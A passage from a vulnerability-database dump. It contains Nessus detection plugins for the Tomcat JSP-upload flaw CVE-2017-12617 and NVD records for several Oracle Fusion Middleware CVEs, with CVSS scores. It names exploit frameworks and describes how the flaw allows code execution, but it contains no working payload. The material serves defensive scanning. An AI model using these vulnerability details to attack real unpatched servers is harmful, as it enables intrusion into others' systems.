script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"8.0.47\", min:\"8.0.0.RC1\", severity:SECURITY_WARNING, granularity_regex:\"^8\\.0\\.$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:42", "description": "A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)", "cvss3": {}, "published": "2017-10-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 / tomcat80,tomcat7 (ALAS-2017-913)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "p-cpe:/a:amazon:linux:tomcat80", "p-cpe:/a:amazon:linux:tomcat80-admin-webapps", "p-cpe:/a:amazon:linux:tomcat80-docs-webapp", "p-cpe:/a:amazon:linux:tomcat80-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat80-javadoc", "p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat80-lib", "p-cpe:/a:amazon:linux:tomcat80-log4j", "p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat80-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-913.NASL", "href": "https://www.tenable.com/plugins/nessus/104179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-913.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104179);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_xref(name:\"ALAS\", value:\"2017-913\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 / tomcat80,tomcat7 (ALAS-2017-913)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12617)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2017-913.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat8' to update your system.\n\nRun 'yum update tomcat80' to update your system.\n\nRun 'yum update tomcat7' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-admin-webapps-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-docs-webapp-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-el-3.0-api-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-javadoc-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-jsp-2.3-api-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-lib-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-log4j-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-servlet-3.1-api-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-webapps-8.0.47-1.78.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-06T14:15:20", "description": "Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). The supported version that is affected is 11.1.2.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.0 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10262", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10262"], "modified": "2018-01-25T13:52:00", "cpe": ["cpe:/a:oracle:access_manager:11.1.2.3.0"], "id": "CVE-2017-10262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10262", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:15:26", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10273", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-25T13:52:00", "cpe": ["cpe:/a:oracle:jdeveloper:12.2.1.2.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.1", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.0", "cpe:/a:oracle:jdeveloper:11.1.2.4.0"], "id": "CVE-2017-10273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10273", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:16:04", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10352", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0"], "id": "CVE-2017-10352", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:13:39", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Analytics Web Dashboards). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10068", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10068"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.3.0"], "id": "CVE-2017-10068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-12-06T15:13:36", "description": "Vulnerability in the Oracle HTTP Server component of Oracle Fusion Middleware (subcomponent: Web Listener). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle HTTP Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2561", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2561"], "modified": "2018-01-25T13:53:00", "cpe": ["cpe:/a:oracle:http_server:12.2.1.3.0", "cpe:/a:oracle:http_server:11.1.1.9.0", "cpe:/a:oracle:http_server:12.2.1.2.0", "cpe:/a:oracle:http_server:12.1.3.0.0", "cpe:/a:oracle:http_server:11.1.1.7.0"], "id": "CVE-2018-2561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:http_server:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:13:37", "description": "Vulnerability in the Oracle WebCenter Content component of Oracle Fusion Middleware (subcomponent: Content Server). The supported version that is affected is 11.1.1.9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": 